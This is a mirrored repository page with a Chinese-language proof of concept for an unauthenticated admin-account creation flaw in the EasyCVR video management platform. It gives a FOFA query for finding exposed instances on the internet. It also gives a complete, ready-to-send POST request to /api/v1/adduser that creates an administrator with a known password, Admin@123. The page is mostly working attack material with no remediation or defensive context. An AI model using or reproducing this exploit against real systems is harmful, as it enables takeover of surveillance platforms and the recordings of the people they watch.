admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-08-12 02:57:09 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/EasyCVR视频管理平台/EasyCVR视频管理平台存在任意用户添加漏洞.md

29 lines
733 B
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
## EasyCVR视频管理平台存在任意用户添加漏洞
EasyCVR 视频管理平台是 TSINGSEE 青犀视频旗下一款软硬一体的产品可提供多协议的设备接入、采集、AI 智能检测、处理、分发等服务,攻击者可通过`/api/v1/adduser`接口添加管理员账户
## fofa
```
app="EasyCVR-视频管理平台"
```
## poc
```
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
```
`0e7517141fb53f21ee439b355b5a1d0a` 明文为 `Admin@123`
![image-20240521200022702](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405212000756.png)
Reference in New Issue Copy Permalink